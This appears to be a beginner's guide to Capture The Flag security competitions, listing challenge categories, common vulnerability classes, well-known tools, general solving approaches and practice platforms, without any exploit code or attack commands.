Key Takeaways
- CTFs are the best way to learn hacking
- Specialize in 1-2 categories first
- Write-ups help you learn from others
- Practice on past challenges regularly
Contents
1. What is Capture The Flag?
CTF competitions are cybersecurity challenges where participants solve security puzzles to find hidden "flags" (usually text strings like flag{s0m3_t3xt}). They're the best hands-on way to learn security skills.
CTF Formats
- Jeopardy: Categories with point values, solve challenges individually
- Attack-Defense: Teams attack others while defending their own systems
- King of the Hill: Maintain control of systems
2. Web Exploitation
Common Web Challenges
# Look for these vulnerabilities:
# - SQL Injection
# - XSS (Cross-Site Scripting)
# - SSTI (Server-Side Template Injection)
# - File Upload/LFI/RFI
# - SSRF
# - Authentication bypasses
# Tools
Burp Suite, OWASP ZAP
sqlmap, ffuf, gobuster
Browser DevTools (F12)
# Quick checks
robots.txt, .git/, backup files
Source code comments
Hidden parameters3. Cryptography
# Common crypto challenges:
# - Caesar/ROT13/substitution ciphers
# - XOR with repeating key
# - RSA with weak parameters
# - Hash cracking
# - Padding oracle attacks
# Tools
CyberChef (essential!)
dcode.fr
RsaCtfTool (RSA attacks)
hashcat, john the ripper
# Quick wins
# Base64, hex, binary encoding
# RSA: small e, common primes, Wiener attack4. Binary Exploitation (Pwn)
# Binary exploitation challenges:
# - Buffer overflow
# - Format string
# - Return-Oriented Programming (ROP)
# - Heap exploitation
# Tools
pwntools (Python)
gdb + gef/pwndbg
ROPgadget, ropper
checksec
# Approach
1. checksec (what protections?)
2. Find vulnerability (overflow, format string)
3. Control EIP/RIP
4. Bypass mitigations
5. Get shell / read flag5. Reverse Engineering
# Reverse engineering challenges:
# - Understand program logic
# - Find password/key
# - Bypass checks
# - Deobfuscate code
# Tools
Ghidra (free, powerful)
IDA Pro (industry standard)
radare2/Cutter
dnSpy (.NET)
jadx (Android)
# Approach
1. Identify file type (file, binwalk)
2. Find main function
3. Locate key checks
4. Understand logic or patch6. Forensics
# Forensics challenges:
# - File carving
# - Steganography
# - Memory analysis
# - Network packet analysis
# - Disk image analysis
# Tools
Autopsy (disk forensics)
Volatility (memory)
Wireshark (network)
steghide, zsteg, binwalk
exiftool (metadata)
# Quick checks
strings, file, binwalk
Check LSB steganography
Look for hidden partitions7. Misc & OSINT
# Miscellaneous challenges:
# - Programming/scripting
# - Trivia/research
# - Unconventional puzzles
# - OSINT investigation
# OSINT approach
Reverse image search
EXIF data
Social media investigation
Geolocation
# Scripting (Python is essential)
# Automate repetitive tasks
# Parse large files
# Interact with services8. Learning Resources
Practice Platforms
- PicoCTF: Beginner-friendly
- HackTheBox: Machines and challenges
- TryHackMe: Guided learning paths
- OverTheWire: Linux/security games
- pwnable.kr: Pwn challenges
- cryptopals.com: Crypto challenges
CTF Calendar
- CTFtime.org: Find upcoming CTFs
- Team ranking: Track your progress
- Write-ups archive: Learn from solutions
FAQ
I'm a beginner, where do I start?
Start with PicoCTF or TryHackMe beginner paths. Focus on web and crypto first as they're most accessible. Read write-ups after attempting challenges.